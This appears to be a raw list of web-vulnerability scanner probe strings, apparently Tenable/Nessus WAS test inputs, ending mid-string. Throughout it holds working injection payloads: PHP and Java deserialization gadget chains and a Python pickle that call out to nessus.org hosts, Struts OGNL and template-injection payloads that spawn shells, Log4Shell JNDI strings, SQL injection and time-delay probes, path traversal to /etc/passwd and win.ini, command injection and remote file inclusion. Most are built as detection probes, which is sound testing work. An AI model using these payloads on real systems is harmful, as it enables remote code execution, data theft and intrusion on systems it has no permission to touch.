YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6Imloem5iMmF2bmpueGd3c3Z0YnJ6eXAycWZrN3N4aW9sNGR2bHd4aXMzM29vbW9hZjdqNWEud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
nessus_was_textaeb7ypvt
nessus_was_texts1600xqb
nessus_was_textwe7nee9r
a:2:{i:7%3BO:15:”Zend\Log\Logger”:1:{s:10:”%00*%00writers”%3Ba:1:{i:0%3BO:20:”Zend\Log\Writer\Mail”:3:{s:15:”%00*%00eventsToMail”%3Ba:1:{i:0%3Bi:0%3B}s:21:”%00*%00subjectPrependText”%3Bs:0:””%3Bs:24:”%00*%00numEntriesPerPriority”%3Ba:1:{i:0%3BO:14:”Zend\Tag\Cloud”:2:{s:7:”%00*%00tags”%3Ba:1:{i:0%3Bs:0:””%3B}s:15:”%00*%00tagDecorator”%3BO:34:”Zend\Tag\Cloud\Decorator\HtmlCloud”:3:{s:12:”%00*%00separator”%3Bs:0:””%3Bs:10:”%00*%00escaper”%3BO:20:”Zend\Escaper\Escaper”:1:{s:18:”%00*%00htmlAttrMatcher”%3Ba:2:{i:0%3BO:23:”Zend\Filter\FilterChain”:1:{s:10:”%00*%00filters”%3BO:13:”SplFixedArray”:2:{i:0%3Ba:2:{i:0%3BO:14:”Zend\Json\Expr”:1:{s:13:”%00*%00expression”%3Bs:11:”tenable.was”%3B}i:1%3Bs:10:”__toString”%3B}i:1%3Bs:13:”gethostbyname”%3B}}i:1%3Bs:6:”filter”%3B}}s:11:”%00*%00htmlTags”%3Ba:1:{s:1:”h”%3Ba:1:{s:1:”a”%3Bs:1:”!”%3B}}}}}}}}i:7%3Bi:7%3B}
file:///etc/passwd
nessus_was_text283cj5hl
nessus_was_textcvtsmfj7
@(“tnbwas_03T5bTMDxx6u”+5049*1384)
nessus_was_textpxmstvsw
nessus_was_textbskdani5
{{=”tnbwas_03T5bTMDxx6u”+5049*1384}}
nessus_was_text6jk3nuru
{{“tnbwas_03T5bTMDxx6u”+str(5049*1384)}}
{% if request[‘application’][‘__globals__’][‘__builtins__’][‘__import__’](‘socket’).gethostbyname(‘itvnk75irnnkamihvxl73cvoygxplly3hvl2tii5ozkkk3tpqvzq’+’.was.nessus.org’)[‘read’] %}{% endif %}
nessus_was_text2jw8ld7y”‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIHdpaG15cmV2dTZ3cHRqcWd4bnVmaWR2NDRhNXB4bG1keGlpZXE3eWE0a3BleXo1NXJpM3Eud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_text0tfio2g1
was_47gZKVmW06n9
<!DOCTYPE test []>&xxe;
nessus_was_text2v73a7u1′”
Version:|Vendor:
nessus_was_text8srtecy2
“/;-window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()//
wasxsscontext4x1d1b
nessus_was_textq0za4xbr
https://xssrcHoXxIePz.was.tenable.com
nessus_was_textb9t0vxe6 tenable_wasscan_xss_in_tag=77d70135-16d5-4596-b30a-a01d49169e73 blah=
‘ || ‘a’==’a
abcd
nessus_was_textea7il0si
6339
nessus_was_textp4wtr3pr
-1839′ or ‘1839’=’1839
nessus_was_textjbz8wt9w
nessus_was_textnip37m35
-1839
nessus_was_textf2s3txgk
nessus_was_textwarxwz1x
1′ limit 0, 1386 —
1386a
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
10002’+(select ‘1’,’2′)+’1
nessus_was_textz4kic617
10002
-1845
-1756′ or ‘1756’=’1756′ — +
sleep 4
nessus_was_textirj7jr4w
nessus_was_texthh3co38i
nessus_was_textpco9ecqq
nessus_was_textw87gitg5
sleep(4);
nessus_was_textu2cy3yf7
nessus_was_text6d7c93lj AND (SELECT 6364 FROM (SELECT(SLEEP(2)))kwbxM)
nessus_was_texth9qg0r1j
nessus_was_text8pazycxo
nessus_was_textzitqykhr
nessus_was_textre4avhks
nessus_was_textwrghqfkv
nessus_was_text5rkk3yg3
;waitfor delay ‘0:0:2’– “;waitfor delay ‘0:0:2’– “
nessus_was_textsx74bypr
nessus_was_texteyct4s2k
nessus_was_texto1wdiv59
nessus_was_textffc2249o
nessus_was_textuar3v93s
nessus_was_textpmkymkym${dns:address|7kjpxtb7wa6owdvcvud7wavyllkktjonu5hp2fkdyjeh6gqk7blq.was.nessus.org}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((586*305))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%{#_memberAccess.allowPrivateAccess=true,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getRuntime(),#s=new java.util.Scanner(#a.exec(‘bash -c {echo,WAS-$((970*807))}’).getInputStream()).useDelimiter(‘\\A’),#str=#s.hasNext()?#s.next():”,#res.print(#str),#res.close()
}
‘tnbwas_m2QRo09ABjZO’+3898*2402
nessus_was_textu0efxk6t
nessus_was_textzz8p2c02
nessus_was_text6gfb7cx3
nessus_was_textx608yngk
nessus_was_textu5vltmtn
nessus_was_textu5vltmtn
was-tnb-luk
nessus_was_textio75qh62
nessus_was_texttz5mkioz
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400437765616b7137716f6d6e6a6b70746b336c366d7534746c6f696c676c37736877646f33726c65356137366f737a343636686f65612e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f7765616b7137716f6d6e6a6b70746b336c366d7534746c6f696c676c37736877646f33726c65356137366f737a343636686f65612e7761732e6e65737375732e6f726778
nessus_was_textt0jk6gnv#^($!@$)(()))******
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textmdpxoyeo’;.”)
abcd
nessus_was_text6qprywae
nessus_was_textcc6i1amm
nessus_was_text1asny0so
nessus_was_textovdidegi
..;/..;/..;/..;/..;/..;/..;/..;/windows/win.ini
nessus_was_textuy2l57ze
nessus_was_textvx8x8r5d
nessus_was_text013p4dm7
%2e%2e%2fapp.js
https://rfi.nessus.org/rfi.txt
nessus_was_textojtvz4go
YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6IjU2cnNoYW02ZGszdGRpYnJ5N2k2bmhyanliYTc0Z2J1emZkb2NqM3VpNzNkbG5yNXRod3Eud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
YToyOntpOjc7Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086Mjg6IklsbHVtaW5hdGVcRXZlbnRzXERpc3BhdGNoZXIiOjE6e3M6MTI6IgAqAGxpc3RlbmVycyI7YToxOntzOjY3OiJuNndod2N6bHRycHZ5bXlqc3RqMjZucmpjZmRzYWN0aWx5bmU3dmZjaDU3NnNrdWdic2lxLndhcy5uZXNzdXMub3JnIjthOjE6e2k6MDtzOjEzOiJnZXRob3N0YnluYW1lIjt9fX1zOjg6IgAqAGV2ZW50IjtzOjY3OiJuNndod2N6bHRycHZ5bXlqc3RqMjZucmpjZmRzYWN0aWx5bmU3dmZjaDU3NnNrdWdic2lxLndhcy5uZXNzdXMub3JnIjt9aTo3O2k6Nzt9
nessus_was_textlksv78zq
nessus_was_textzz68har8
nessus_was_textnzea9lcu
file:///etc/passwd
nessus_was_text6ufy58j6
nessus_was_texthbg77bgb
nessus_was_textgabdm5f1
{{“73538770” | printf “%s%s” “tnbwas_Q7MMxkgATNvQ”}}
nessus_was_text50suw11f
nessus_was_textzs21a5r6
nessus_was_textcgbsl67i
nessus_was_text35svnv4r
nessus_was_textnx0ae6la”‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIDNiMjRvcnJrZ2pyN3l5dzR0eDJ6bXg2Mnk3NHZydnBlNjQ1cXJxYWR2Y281c2dnc3Nxa3Eud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_textat4pwpkm
<!DOCTYPE test []>&xxe;
nessus_was_textjebcgikr'”
Version:|Vendor:
nessus_was_textbyn9rkmm
nessus_was_textvu8desc7
wasxsscontext7t3x4f
nessus_was_text9nhd3c4y script:;tenable_wasscan_xss_in_element_event=9c82a66b-2e38-40dc-99ea-51cf61599ed1//
https://xssrcwMwjHWWF.was.tenable.com
nessus_was_textvwmeqbgb
nessus_was_textg08x51n3
abcd
nessus_was_textuwrsb233
nessus_was_textxc7k8fou
nessus_was_textxx77zy9e
-1839′ or ‘1839’=’1839
-1839
nessus_was_textf9b3iy6t
1′ limit 0, 1386 —
nessus_was_text3t8rvbv5
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
10002+(select 1,2)+1
nessus_was_textl5wvoluh
-1845
-1756
sleep 4
nessus_was_text0qiggijv
nessus_was_textcwcsaeot
nessus_was_textozy8u0yz
nessus_was_text2q0684w4
sleep(4);
nessus_was_textpr939nny
nessus_was_text370hk6br AND (SELECT 2804 FROM (SELECT(SLEEP(2)))FEoau)
nessus_was_textficrv9bb
nessus_was_textpt1mpvw6
nessus_was_textc5mtqrqo
nessus_was_textmmml6rx9
nessus_was_textli5667gm
nessus_was_texty7k8j0tk
);waitfor delay ‘0:0:2’– “);waitfor delay ‘0:0:2’– “
nessus_was_textamresixe
nessus_was_textlmrswa0l
nessus_was_text49xe7y08
nessus_was_textnk0cl1zc${dns:address|arnwghuzlrdkakxoojdoxh74dljv5op3j4xagk6qz7tddrsvba2a.was.nessus.org}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((379*269))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%{#_memberAccess.allowPrivateAccess=true,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getRuntime(),#s=new java.util.Scanner(#a.exec(‘bash -c {echo,WAS-$((703*154))}’).getInputStream()).useDelimiter(‘\\A’),#str=#s.hasNext()?#s.next():”,#res.print(#str),#res.close()
}
‘tnbwas_bfVpX691vrbh’+1463*3625
nessus_was_textzplweu4b
nessus_was_textrnpksl1g
php://input
nessus_was_textdxj0fvvl
nessus_was_texthym3fp7d
nessus_was_textg6ggtotl
${jndi:ldap://was-log4shell-${date:yyyy}1gdA87SyKEKFamQcZ89W.w.nessus.org}
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740043676a74323572796f613363737364356573776c76336265636a75797134796b6666717a64686266333376627774746d33346b77612e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f676a74323572796f613363737364356573776c76336265636a75797134796b6666717a64686266333376627774746d33346b77612e7761732e6e65737375732e6f726778
nessus_was_text7h3ouhbs#^($!@$)(()))******
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textidmhrhzl’;.”)
nessus_was_textwgorijp1
nessus_was_text6khmhnui
nessus_was_text2acy4io8
nessus_was_textzu3d2jay
nessus_was_textrph8r2gj
nessus_was_textgxjp83xg
nessus_was_textr9qr5hwo
../../../../../../../../etc/passwd%00.jpg
nessus_was_text0b2a6qolhTtPs://rfi.nessus.org/rfi.txt
YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6ImwzNDNtaHVqd3IyNGpvbXhmbXJ2NWkzZHNnZzN1Y3JydjdhNGxzM2ZoeXZqemtiNXVhcWEud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
nessus_was_textqcqr0xby
nessus_was_textqkfnaf6a
nessus_was_textf7rut3sn
nessus_was_texthtal1bc1
file:///etc/passwd
nessus_was_textc54twc79
nessus_was_textvf2ygkb6
nessus_was_text67xlsb3q
nessus_was_text1ai5y72f
nessus_was_text9f30wsk0
nessus_was_textzuchd20t
nessus_was_textkjsjaekj
nessus_was_text5hf86x9h
nessus_was_text92fh89wg”‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIGV2dmJtaXB2NXR2aXA2b3plZWx3dzNvYW55engzd2pxcXZzeWFwa25ncnhwcHhraGFpdmEud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_textpwrp2x1o
was_lFsUNCPWpTEx
<!DOCTYPE test []>&xxe;
nessus_was_text1fym7cjz'”
Version:|Vendor:
nessus_was_textwg3j45d8
nessus_was_texttnordbp7
wasxsscontext4b7k8z
nessus_was_textrpzj7cfi script:;tenable_wasscan_xss_in_element_event=4d976540-b23d-413b-9a47-98dba5278133//
https://xssrctCwicZws.was.tenable.com
nessus_was_textummkxbtv tenable_wasscan_xss_in_tag=4d976540-b23d-413b-9a47-98dba5278133 blah=
nessus_was_text0g1ix15w
nessus_was_textly3nuguu
abcd
nessus_was_textfx9xuvmn
6339
nessus_was_text0ud4u2b9
nessus_was_texthkl79hf0
-1839
10001839″ or “1839”=”1839
1′ limit 0, 1386 —
1386a
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
nessus_was_textvvj8qj40
10002
-1845
nessus_was_textglxpw93q
sleep 4
nessus_was_texth5by8crd
nessus_was_textlmqp5yy2
nessus_was_text40zbsinz
nessus_was_textyvqjzmaj
sleep(4);
nessus_was_textrvehfutj
nessus_was_text9bnyjhd4 AND (SELECT 7102 FROM (SELECT(SLEEP(2)))AtWCF)
nessus_was_textmkw5qu68
nessus_was_textrjrtxs98
nessus_was_textweu8qwh9
nessus_was_textt1cd7f87
nessus_was_textpzkvydyo
nessus_was_text08pbt0zr
nessus_was_textf19q7xc6
nessus_was_textqq4qbpi3
nessus_was_textgejdip3p
nessus_was_textwvwvrh3s${dns:address|l26ooauhznzf276oxkplqyseq6v4znrr2kb5567oiwlnzayszjiq.was.nessus.org}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((327*481))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%{#_memberAccess.allowPrivateAccess=true,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getRuntime(),#s=new java.util.Scanner(#a.exec(‘bash -c {echo,WAS-$((161*188))}’).getInputStream()).useDelimiter(‘\\A’),#str=#s.hasNext()?#s.next():”,#res.print(#str),#res.close()
}
‘tnbwas_OGitvra3YMSY’+6778*5296
nessus_was_textv1x6668a
p “WAS#{65167*76553}”
php://input
was-tnb-bmg
${jndi:ldap://was-log4shell-${date:yyyy}IMDAcTAWtjgR0V4iAfbX.w.nessus.org}
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400437562327335686b626470726e616e6b646a64676c793266776935756e64746966666b65717374757833347370716a7978626d62712e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f7562327335686b626470726e616e6b646a64676c793266776935756e64746966666b65717374757833347370716a7978626d62712e7761732e6e65737375732e6f726778
nessus_was_text7nmgcwr2#^($!@$)(()))******
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textynqt8pf4′;.”)
abcd
nessus_was_text9xoa86e9
nessus_was_textshw1zhme`id`
nessus_was_text2cbdbn2nnslookup -domain=”was.nessus.org” shwxffro6gshcls2us3tdff7qo7soj7jhetjtjvvzc7f7amspf3q
nessus_was_textvp74mjc2
nessus_was_textgbrhse8w
nessus_was_textjjzsvlce
nessus_was_textlwdgq1x3
nessus_was_text113tddfh
nessus_was_textr93coy5rhTtPs://rfi.nessus.org/rfi.txt
YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6ImNob3VxYXh4ZmdjYW9rbnQycGRoN2hsY2M1M2pmemZvY3Fzb3JhM3p3dW1hYnl2amNwb2Eud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
nessus_was_textfvehr3t7
YToyOntpOjc7TzoxODoiU2xpbVxIdHRwXFJlc3BvbnNlIjoyOntzOjEwOiIAKgBoZWFkZXJzIjtPOjg6IlNsaW1cQXBwIjoxOntzOjE5OiIAU2xpbVxBcHAAY29udGFpbmVyIjtPOjE0OiJTbGltXENvbnRhaW5lciI6Mzp7czoyMToiAFBpbXBsZVxDb250YWluZXIAcmF3IjthOjE6e3M6MzoiYWxsIjthOjI6e2k6MDtPOjg6IlNsaW1cQXBwIjoxOntzOjE5OiIAU2xpbVxBcHAAY29udGFpbmVyIjtPOjg6IlNsaW1cQXBwIjoxOntzOjE5OiIAU2xpbVxBcHAAY29udGFpbmVyIjtPOjE0OiJTbGltXENvbnRhaW5lciI6Mzp7czoyMToiAFBpbXBsZVxDb250YWluZXIAcmF3IjthOjE6e3M6MzoiaGFzIjtzOjEzOiJnZXRob3N0YnluYW1lIjt9czoyNDoiAFBpbXBsZVxDb250YWluZXIAdmFsdWVzIjthOjE6e3M6MzoiaGFzIjtzOjEzOiJnZXRob3N0YnluYW1lIjt9czoyMjoiAFBpbXBsZVxDb250YWluZXIAa2V5cyI7YToxOntzOjM6ImhhcyI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7fX19fWk6MTtzOjY3OiJ2bzZib2N3cWVkanBtbzV5aWM2M2YzcDR3NnI0MnJyNHJvaDcyajZmeWV5NWwzNXoyZnJxLndhcy5uZXNzdXMub3JnIjt9fXM6MjQ6IgBQaW1wbGVcQ29udGFpbmVyAHZhbHVlcyI7YToxOntzOjM6ImFsbCI7YToyOntpOjA7Tzo4OiJTbGltXEFwcCI6MTp7czoxOToiAFNsaW1cQXBwAGNvbnRhaW5lciI7Tzo4OiJTbGltXEFwcCI6MTp7czoxOToiAFNsaW1cQXBwAGNvbnRhaW5lciI7TzoxNDoiU2xpbVxDb250YWluZXIiOjM6e3M6MjE6IgBQaW1wbGVcQ29udGFpbmVyAHJhdyI7YToxOntzOjM6ImhhcyI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7fXM6MjQ6IgBQaW1wbGVcQ29udGFpbmVyAHZhbHVlcyI7YToxOntzOjM6ImhhcyI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7fXM6MjI6IgBQaW1wbGVcQ29udGFpbmVyAGtleXMiO2E6MTp7czozOiJoYXMiO3M6MTM6ImdldGhvc3RieW5hbWUiO319fX1pOjE7czo2Nzoidm82Ym9jd3FlZGpwbW81eWljNjNmM3A0dzZyNDJycjRyb2g3Mmo2ZnlleTVsMzV6MmZycS53YXMubmVzc3VzLm9yZyI7fX1zOjIyOiIAUGltcGxlXENvbnRhaW5lcgBrZXlzIjthOjE6e3M6MzoiYWxsIjthOjI6e2k6MDtPOjg6IlNsaW1cQXBwIjoxOntzOjE5OiIAU2xpbVxBcHAAY29udGFpbmVyIjtPOjg6IlNsaW1cQXBwIjoxOntzOjE5OiIAU2xpbVxBcHAAY29udGFpbmVyIjtPOjE0OiJTbGltXENvbnRhaW5lciI6Mzp7czoyMToiAFBpbXBsZVxDb250YWluZXIAcmF3IjthOjE6e3M6MzoiaGFzIjtzOjEzOiJnZXRob3N0YnluYW